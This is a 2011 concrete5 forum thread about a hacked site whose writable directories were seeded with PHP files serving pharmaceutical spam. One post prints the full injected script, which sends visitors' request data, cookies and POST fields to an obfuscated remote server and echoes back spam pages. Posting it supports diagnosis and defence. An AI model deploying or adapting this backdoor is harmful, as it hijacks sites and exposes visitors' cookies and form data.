Developing (v7+)

C5 site compromised (related to chmod open directories).

Permalink June 06, 2011 at 10:19 AM

A major site I manage running concrete5 has just be compromised with pharmaceutical ads. The attack was related to open chmod directories (updates / packages / etc).

The site is still functioning properly, but compromised directories have allowed the "hacker" to insert php files that serve pharmaceutical ads. Take a quick glance at a google search:
http://www.google.com/#sclient=psy&hl=en&source=hp&q=si...

Especially bad is the fact that the compromised file was loading content within the page templates. Nothing ruins your Monday like having Viagra ads served right underneath your own logo....

This isn't really a concrete5 problem, but perhaps directories that are going to need open chmods should be forced to contain a read-only, redirecting index files - the same is true for packages.

The attacker used common directories (updates / config / etc) but also targeted the (packages / packages/flickr) folders.

Other than re-chmodding directories only when they need written to... does anyone have any other suggestions to prevent this in the future?

Could something like providing concrete5 with it's own FTP account allow directories to be locked down (I'm thinking something like SMTP to send email)?

At least it was easy to fix (this time)...

ijessup replied on Jun 6, 2011 at 10:26 am Permalink Reply

There are open source FTP clients written in PHP.

It would be a good idea (I think) to use one of them as a security tool to lock/unlock directories when packages/updates are being installed. Assuming the web service account was unable to chmod via PHP.

Would make for a good Security Add-on. Could hook into the package install method (if it exists). Could easily store the (S)FTP information in the database with simple DES or AES encryption.

jbx replied on Jun 6, 2011 at 10:28 am Permalink Reply

Interesting...

While I agree that having write permissions on the updates folders etc. for apache would enable apache to write an index.php file to that folder, it doesn't explain how the hacker was able to convince apache to actually create and write the file.

I guess the hacker would need to exploit a vulnerability in the updating process, or hack your ftp account to actually get the file there in the first place. Do your logs show anything that could indicate how the site was exploited?

Jon

glockops replied on Jun 6, 2011 at 10:50 am Permalink Reply

This is what I'd always thought as well... (If you can't tell, I'm more front end than back ;)

Webhost says:

"Here is the official URL of the site pages originate from. It was rot13 encoded.
In case you want to follow any action.

http://dyn328.mydynamicdns.net/"...

Code for the compromised index.php files follows:

<?php
// REVISION: $Rev: 1153 $
error_reporting(0);
$requestTimeout = 60;
$useCurl = 0;
$seal = '7aY#4EwrU_eC2AbEcuP?8keYe&ruQuxE=R46eQ38eHE27aZeFr7W7eSp=752xen?';
class HttpRequest
{
  // Request mode, 0 - use CURL, 1 - use SOCKETS
  var $mode = 0;
  var $timeout = 60;
  function HttpRequest($mode = 0, $timeout = 60)
  {
    $this->mode = ($mode == 0 && function_exists('curl_init') ? 0 : 1);
    $this->timeout = $timeout;

Viewing 15 lines of 179 lines. View entire code block.

 
<?php
// REVISION: $Rev: 1153 $
 
error_reporting(0);
 
$requestTimeout = 60;
$useCurl = 0;
$seal = '7aY#4EwrU_eC2AbEcuP?8keYe&ruQuxE=R46eQ38eHE27aZeFr7W7eSp=752xen?';
 
class HttpRequest
{
  // Request mode, 0 - use CURL, 1 - use SOCKETS
  var $mode = 0;
  var $timeout = 60;
  function HttpRequest($mode = 0, $timeout = 60)
  {
    $this->mode = ($mode == 0 && function_exists('curl_init') ? 0 : 1);
    $this->timeout = $timeout;
  }
 
  function _connect($host, $port) {
    $errno = null;
    $errstr = null;
    $hf = fsockopen($host, $port ? $port : 80, $errno, $errstr, $this->timeout);
    return $hf;
  }
 
  function _disconnect($hs) {
    fclose($hs);
  }
 
  function request($url, $post_data = false) {
    switch ($this->mode)
    {
    case 0:
      return $this->_requestCurl($url, $post_data);
    case 1:
      return $this->_requestSock($url, $post_data);
    default:
      return false;
    };
  }
 
  function _requestCurl($url, $post_data) {
    $hc = curl_init($url);
    //echo "URL: [{$url}]<br>\n";
    if ($post_data)
      curl_setopt($hc, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($hc, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($hc, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($hc, CURLOPT_AUTOREFERER, 1);
    curl_setopt($hc, CURLOPT_CONNECTTIMEOUT, $this->timeout);
    $res = curl_exec($hc);
    $this->httpStatus = curl_getinfo($hc, CURLINFO_HTTP_CODE);
    //echo "Status: {$this->httpStatus}<br>\n";
    curl_close($hc);
    return $res;
  }
 
  function _requestSock($url, $post_data) {
    $info = parse_url($url);
    $httpHostStr = $info['host'];
    if ($info['port'])
      $httpHostStr .= ':' . $info['port'];
    if (!empty($post_data)) {
      $rtype = 'POST';
      $post = array();
      foreach ($post_data as $key => $val)
      {
        $post[] = urlencode($key) . '=' . urlencode($val);
      };
      $post = implode('&', $post);
      $contentLength = strlen($post);
      $content = "Content-Type: application/x-www-form-urlencoded\nContent-length: " . strlen($post) . "\n\n" . $content;
    }
    else {
      $rtype = 'GET';
      $post = '';
      $content = "\n";
    };
    $req = <<<EOR
{$rtype} {$url} HTTP/1.0
Host: {$httpHostStr}
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8
Accept-Language: en
{$content}
EOR;
    //echo "REQUEST:<br>\n---<pre>{$req}</pre>\n";
    $hc = $this->_connect($info['host'], $info['port']);
    if (!$hc) {
      trigger_error("Failed to connect to [{$info['host']}]", E_USER_WARNING);
      return false;
    };
    fwrite($hc, $req);
    $res = '';
    while (!feof($hc))
      $res .= fread($hc, 8192);
    $this->_disconnect($hc);
    if (preg_match('/^HTTP\/[^\s]+\s+(\d+)/', $res, $match)) {
      $this->httpStatus = $match[1];
    }
    else {
      $this->httpStatus = 666;
      return false;
    };
    //echo "Status: {$this->httpStatus}<br>\n";
    if (preg_match('/^.+?(?:\r\n\r\n|\n\n)(.*)$/ms', $res, $match)) {
      return $match[1];
    };
    $this->httpStatus = 666;
    return false;
  }
};
 
function die404()
{
  header("{$_SERVER['SERVER_PROTOCOL']} 404 Not Found");
  die( <<<EOM
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL {$_SERVER['REQUEST_URI']} was not found on this server.</p>
<hr>
<address>{$_SERVER['SERVER_SOFTWARE']} Server at {$_SERVER['SERVER_NAME']} Port {$_SERVER['SERVER_PORT']}</address>
</body></html>
EOM
    );
}
 
function unslash_rec(&$arr) {
  reset($arr);
  while (list($key)=each($arr)) {
    if (is_array($arr[$key]))
      unslash_rec($arr[$key]);
    else {
      $arr[$key]=stripslashes($arr[$key]);
    };
  };
};
 
set_magic_quotes_runtime(false);
 
if (get_magic_quotes_gpc()) {
  unslash_rec($_GET);
  unslash_rec($_POST);
  unslash_rec($_REQUEST);
  unslash_rec($_COOKIE);
  foreach ($_FILES as $key => $val)
    $_FILES[$key]['name'] = stripslashes($_FILES[$key]['name']);
};
 
 
$post = Array(
  'self' => 'http://' . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . $_SERVER['REQUEST_URI'],
  'sub_id' => '',
  //'page' => $_REQUEST['p'],
  'PHP_SELF' => $_SERVER['PHP_SELF'],
  'SERVER_PROTOCOL' => $_SERVER['SERVER_PROTOCOL'],
  'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'],
  'HTTP_REFERER' => $_SERVER['HTTP_REFERER'],
  'HTTP_USER_AGENT' => $_SERVER['HTTP_USER_AGENT'],
  'HTTP_ACCEPT_CHARSET' => $_SERVER['HTTP_ACCEPT_CHARSET'],
  'GET' => serialize($_GET),
  'POST' => serialize($_POST),
  'COOKIE' => serialize($_COOKIE),
);
//$masterUrl = str_rot13('uggc://qvaq.tevobxubfg.pbz/');
//$masterUrl = str_rot13('uggc://fho026.choyvpqaffreire.bet/');
$masterUrl = str_rot13('uggc://qla328.zlqlanzvpqaf.arg/');
//$masterUrl = 'http://ddg.mb.local/';
$url = "{$masterUrl}rgw.php";
$req = new HttpRequest($useCurl, $requestTimeout);
$pageTxt = $req->request($url, $post);
//echo $pageTxt;
if (!$pageTxt)
  die404();
$page = unserialize($pageTxt);
//print_r($page);
if ($page['seal'] != $seal) {
  //echo $pageTxt; // TODO: *** DEBUG, delete this!!! ***
  die404();
}
foreach ($page['headers'] as $header) {
  header($header);
}
//echo "<pre>";
//print_r($page);
//echo "</pre>";
echo $page['content'];
?>

I'll try to dig into the access logs today.
Just a quick glance through analytics (google webmaster tools) shows thousands... upon thousands of incoming links from unrelated, but real websites that have been compromised in a similar manner. All follow a /{some folder}/index.php?f=#### pattern.

I'm not exactly how sure this site has been compromised - our IT department just happen to receive a call from someone that found it. The pages in Google's cache report creation dates near the middle of may, a few of those index files have dates in October...

ijessup replied on Jun 6, 2011 at 11:14 am Permalink Reply

If the site hosted on a shared platform, then the vulnerability could actually be from someone else's site(s).

I remember back in the day exploiting CGI to get access to the server's PHP.ini file because share hosts were usually stupid slow at getting things modified for you. To this day it still amazes me how insecure things used to be, and in some cases still are.

I remember about a year ago, the CGI exploit was possible on c5's servers. This was quickly rectified when brought to their attention. There was, and think there still is, a running competition that anyone who can hack c5 get's $500.

So, my intuition tells me that the hack was likely external to c5 itself. And was likely due to unauthorized FTP access. Or came from a self replicating CGI script.

I'm guessing that there was no damage to the database? If not, then c5 was not the target. It would be interesting to know if the hosting company will divulge any information about any other sites on that server being hacked as well. I would guess they wouldn't tell you for fear of losing customers.

Forums

Developing (v7+)

C5 site compromised (related to chmod open directories).

Code

Post Reply

Delete Post

Mark Post as Spam

Destroy Spammer

Sign In?